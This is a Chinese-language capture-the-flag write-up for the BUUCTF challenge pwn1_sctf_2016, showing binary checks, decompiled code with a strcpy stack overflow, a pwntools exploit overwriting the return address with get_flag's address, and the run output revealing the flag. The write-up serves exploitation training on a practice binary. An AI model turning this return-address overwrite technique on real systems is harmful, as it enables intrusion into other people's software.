zoukankan      html  css  js  c++  java

  • BUUCTF-PWN爬坑-04-pwn1_sctf_2016

    pwn1_sctf_2016

    file

    root@kali:~/Downloads# file pwn1_sctf_2016 
pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped

    checksec

    root@kali:~/Downloads# checksec pwn1_sctf_2016 
[*] '/root/Downloads/pwn1_sctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled #//栈不可执行
    PIE:      No PIE

    IDA

    int __cdecl main(int argc, const char **argv, const char **envp)
{
  vuln();
  return 0;
}

    int vuln()
{
  const char *v0; // eax
  char s; // [esp+1Ch] [ebp-3Ch]
  char v3; // [esp+3Ch] [ebp-1Ch]
  char v4; // [esp+40h] [ebp-18h]
  char v5; // [esp+47h] [ebp-11h]
  char v6; // [esp+48h] [ebp-10h]
  char v7; // [esp+4Fh] [ebp-9h]

  printf("Tell me something about yourself: ");
  fgets(&s, 32, edata);  //输入限制32个字符
  std::string::operator=(&input, &s);
  std::allocator<char>::allocator(&v5);
  std::string::string(&v4, "you", &v5);
  std::allocator<char>::allocator(&v7);
  std::string::string(&v6, "I", &v7);
  replace((std::string *)&v3);
  std::string::operator=(&input, &v3, &v6, &v4); // I 替换you
  std::string::~string((std::string *)&v3);
  std::string::~string((std::string *)&v6);
  std::allocator<char>::~allocator(&v7);
  std::string::~string((std::string *)&v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(&s, v0);
  return printf("So, %s
", &s);
}
int get_flag()
{
  return system("cat flag.txt");
}

char s; // [esp+1Ch] [ebp-3Ch] #s:60个字符大小
v0 = (const char *)std::string::c_str((std::string *)&input); 
strcpy(&s, v0); //溢出区域

    #get_flag	.text	08048F0D	00000014	0000001C	00000000	R	.	.	.	B	.	.

from pwn import *

ip='node3.buuoj.cn'
port=26973
p = remote(ip,port)

bin_sh =0x08048F0D

payload = 20*b'I' + 4*b'b'+ p32(bin_sh)

p.sendline(payload)
p.interactive()

    root@kali:~/Downloads# python3 pwn1_sctf_2016_exp.py 
[+] Opening connection to node3.buuoj.cn on port 26973: Done
[*] Switching to interactive mode
flag{4068ba06-f18b-4da9-b56a-70d655103e28}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$ ls
  • 相关阅读:
    kickstart自动安装部署RHEL7
    物流即使查询API
    快递单号查询快递鸟API接口-100家快递单轨迹推送
    物流跟踪API-快递单订阅
    如何最快实现物流即使查询功能-物流轨迹查询API
    提供一个不错的物流物流接口给大家,本人亲测,真的不错
    给idea添加类注释和方法注释模板
    分享一个生成反遗忘复习计划的java程序
    用TreeSet和Comparator给list集合元素去重
    对poi-excel导出的浅层理解
  • 原文地址:https://www.cnblogs.com/moke-cn/p/14329959.html
Copyright © 2011-2022 走看看